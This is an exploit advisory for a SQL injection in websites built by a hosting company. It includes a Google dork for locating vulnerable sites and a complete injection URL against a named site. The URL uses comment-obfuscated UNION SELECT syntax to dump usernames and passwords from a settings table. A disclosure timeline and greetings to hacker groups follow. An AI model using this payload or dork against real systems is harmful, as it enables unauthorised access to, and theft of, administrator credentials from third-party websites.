Sites designed by Winprohost.com suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
851d099696e3fd329126858cd6c919d3a2620368af5c244985fbc97a24534d30
##################################################
winprohost Sql Injection Vulnerability
##################################################
# Exploit Title : winprohost Sql Injection Vulnerability
# Google Dork: Design & Host by winprohost.com
#Author: BHG Security Center
# Home: http://cc.black-hg.org - http://greyh4t.com/cc/
# Tested on: [linux+apache]
# Finder(s):Siavash (morghabi_s@yahoo.com)
# Examle:http://dr-nazari.com/display.php?x=4&id=186%27
http://dr-nazari.com/display.php?x=4&id=-186+Union+/*!Select*/+1,/*!group_concat%28UserName,0x3a,Password%29*/,3,4,5,6,7,8,9,10,11,12,13+/*!from+setting*/--
[-] Disclosure timeline:
[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[04/09/2012] - Public disclosure
# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t
~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf
===========================================[End]=============================================